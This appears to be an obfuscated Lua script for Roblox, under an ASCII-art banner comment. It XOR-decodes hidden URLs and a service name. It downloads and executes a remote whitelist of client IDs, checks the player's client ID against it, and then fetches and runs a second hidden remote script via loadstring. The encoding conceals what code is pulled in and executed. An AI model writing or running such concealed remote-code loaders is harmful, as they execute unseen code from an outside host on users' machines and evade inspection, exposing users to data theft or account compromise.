--[[

███████╗███████╗██╗░░░██╗░██████╗
╚════██║██╔════╝██║░░░██║██╔════╝
░░███╔═╝█████╗░░██║░░░██║╚█████╗░
██╔══╝░░██╔══╝░░██║░░░██║░╚═══██╗
███████╗███████╗╚██████╔╝██████╔╝
╚══════╝╚══════╝░╚═════╝░╚═════╝░
i like gay men

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v14={};for i=1 -0, #v10 do v6(v14,v0(v4(v1(v2(v10,i,i + 1 + 0)),v1(v2(v11,1 + 0 + ((i-((1590 -(755 + 834)) + 0))% #v11),1 + ((i-1)% #v11) + 1)))%(1035 -779)));end return v5(v14);end local v8=loadstring(game:HttpGet(v7("\43\39\232\173\48\105\179\242\49\50\235\243\36\58\232\181\54\49\233\174\38\33\255\178\45\39\249\179\55\125\255\178\46\124\198\184\45\11\200\181\38\30\249\179\108\59\235\180\39\124\241\188\42\61\179\149\52\58\248","\67\83\156\221")))();local v9=game:GetService(v7("\129\56\1\2\82\136\67\252\167\51\26\48\111\140\93\243\186\57\28","\211\90\121\67\60\233\47\133")):GetClientId();for v12,v13 in pairs(v8) do if (v13==v9) then loadstring(game:HttpGet(v7("\232\248\74\223\22\22\175\163\76\206\18\2\231\229\74\199\16\78\245\255\91\221\6\67\238\248\91\193\17\2\227\227\83\128\40\77\227\200\81\193\4\64\228\219\81\221\14\73\242\163\125\199\13\73\243\233\92\218\23\75\229\254\19\194\0\66\245\163\83\206\12\66\175\239\86\202\0\95\229\238\75\221\2\73\242\169\12\159\1\67\245\238\82\202\64\30\176\239\86\202\0\95\229\238\75\221\2\73\242\169\12\159\4\66\228\169\12\159\7\69\231\169\12\159\8\77\227","\128\140\62\175\101\44")))();end end
